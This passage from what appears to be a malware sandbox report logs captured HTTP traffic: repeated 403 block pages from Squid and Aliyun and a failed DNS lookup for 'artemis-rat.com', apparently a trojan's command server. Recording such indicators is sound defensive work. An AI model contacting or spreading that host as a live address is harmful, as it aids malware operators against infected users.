3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/5.7Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:14:20 GMTContent-Type: text/html;charset=utf-8Content-Length: 3628X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from lb1X-Cache-Lookup: NONE from lb1:3128Via: 1.1 lb1 (squid/5.7)Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 30 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 6
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 09 Mar 2024 12:14:24 GMTContent-Length: 102Data Raw: 64 69 61 6c 20 74 63 70 3a 20 6c 6f 6f 6b 75 70 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 6f 6e 20 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 72 65 61 64 20 75 64 70 20 31 30 2e 36 34 2e 32 33 38 2e 32 31 36 3a 34 37 30 30 36 2d 3e 31 2e 31 2e 31 2e 31 3a 35 33 3a 20 69 2f 6f 20 74 69 6d 65 6f 75 74 0a Data Ascii: dial tcp: lookup artemis-rat.com on 1.1.1.1:53: read udp 10.64.238.216:47006->1.1.1.1:53: i/o timeout
